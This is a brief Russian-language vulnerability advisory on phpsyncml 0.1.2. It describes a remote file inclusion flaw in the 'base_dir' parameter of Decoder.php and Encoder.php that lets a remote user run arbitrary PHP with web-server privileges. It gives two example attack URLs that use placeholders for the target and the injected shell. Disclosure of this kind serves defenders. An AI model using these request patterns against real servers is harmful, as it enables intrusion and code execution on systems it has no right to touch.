Программа: phpsyncml 0.1.2

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «base_dir» сценариями Decoder.php и Encoder.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

[target]/[path]/wbxml/WBXML/Decoder.php?base_dir=[Shell]

[target]/[path]/wbxml/WBXML/Encoder.php?base_dir=[Shell]



Оставить мнение